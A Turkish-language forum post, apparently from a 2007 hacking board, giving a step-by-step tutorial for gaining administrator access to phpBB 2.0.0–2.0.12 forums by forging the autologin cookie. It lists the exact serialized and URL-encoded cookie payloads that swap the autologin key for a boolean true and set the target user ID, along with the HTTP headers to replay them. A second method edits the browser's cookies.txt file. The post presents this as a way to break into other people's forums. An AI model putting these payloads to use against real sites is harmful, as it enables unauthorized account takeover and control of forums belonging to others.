PDA

Orijinalini görmek için tıklayınız

eXTReMe Tracker
: phpbb 2.0.0-2.0.12 hackleniş cookie editing


Godlin€
06-09-2007, 04:44 AM
ilk önce mozillamızı çekiyoruz i.ie cookie editlendiğinde görmezden geliyor cookie yi

daha sonra headerları görebilmemiz için mozillaya bir eklenti




hacklemek istediğiniz foruma gidin moziiladan tools/http header a tıklayın
size headerları gösterecektir
Kod:
Host: Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D; phpbb2support_sid=13778139464ba09aae4884f5b2550d37

örnek bunun gibi cookie bilgisi burada
Cookie: phpbb2support_data=a%3A0%3A%7B%7D;
ur decoder/encoder a ihtiyacımız var onuda buradan buluyoruz

Kod:
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..


cookimizin görünümü bu
olsun
phpbb2support_data=%3Da%3A2%3A%7Bs%3A11%3A%22autol oginid%22%3Bs%3A32%3A%225555aa38cc19f4d4cb6f2d012e 1e50b2%22%3Bs%3A6%3A%22userid%22%3Bi%3A2%3B%7D%3B% 20;
bunu yukarıdaki linkteki uygulama ile decode ettiğimzde
phpbb2support_data=a:2:{s:11:"autologinid";s:32:"5555aa38cc19f4d4cb6f2d012e1e50b2";s:6:"userid";i:2;};
bu çıkıyor ortaya
s:32:"5555aa38cc19f4d4cb6f2d012e1e50b2"
bunu
b:1 ile değiştiriyoruz burdaki b:1 bütün durumlar için doğru olma olayı
yeni görünümü bu şekilde oluyor
phpbb2support_data=a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";};
sondaki 2 adına login olucağımız kişi
tabi bunları yaparken kayıtlı bir üye olmanız gerekiyor siteye ve beni hatırla butonunu işaretlemiyeceksiniz daha sonra
header a geliyoruz tekrar
reply butonuna basıyoruz ve cookie mizi yapıştırıyoruz
bunu yapmadan önce
phpbb2support_data=a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";};
bunu encode ediyoruz görünümü bu oluyor
phpbb2support_data%3Da%3A2%3A%7Bs%3A11%3A%22autolo ginid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A %222%22%3B%7D%3B
bunuda reply kısmına bilgiler ile birlikte yağıştırıyoruz




Kod:
Host: Sitedeki Linkleri Sadece Üyelerimiz Görebilir..***.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data%3Da%3A2%3A%7Bs%3A11%3A%22autolo ginid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A %222%22%3B%7D%3B


ve adminsiniz


bu zor olanı şimdi 2. yönteme geçelimbunda foruma girmenize bile gerek yok

mozillanız olsun yeter
C:\Documents and Settings\phiberoptic\Application Data\Mozilla\Firefox\Profiles\pv2jph4y.default
bu dizinini içine giriyorsunuz içinde cookies.txt olan dosya var onu açıyorsunuz
karşınızda cookieler

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
bunun gibi burda 127.0.0.1 hackleyeceğiniz forumun adresi forumun versiyonunun 2.0.13 ten küçük olması lazım bu kısımı
a%3A0%3A%7B%7D
bununla değiştiriyoruz
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
yani cookieminzin görünümü şu şekilde oluyor

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
cookie yi kaydedip yeniden girdiğinizde ise yönetici haklarına sahipsiniz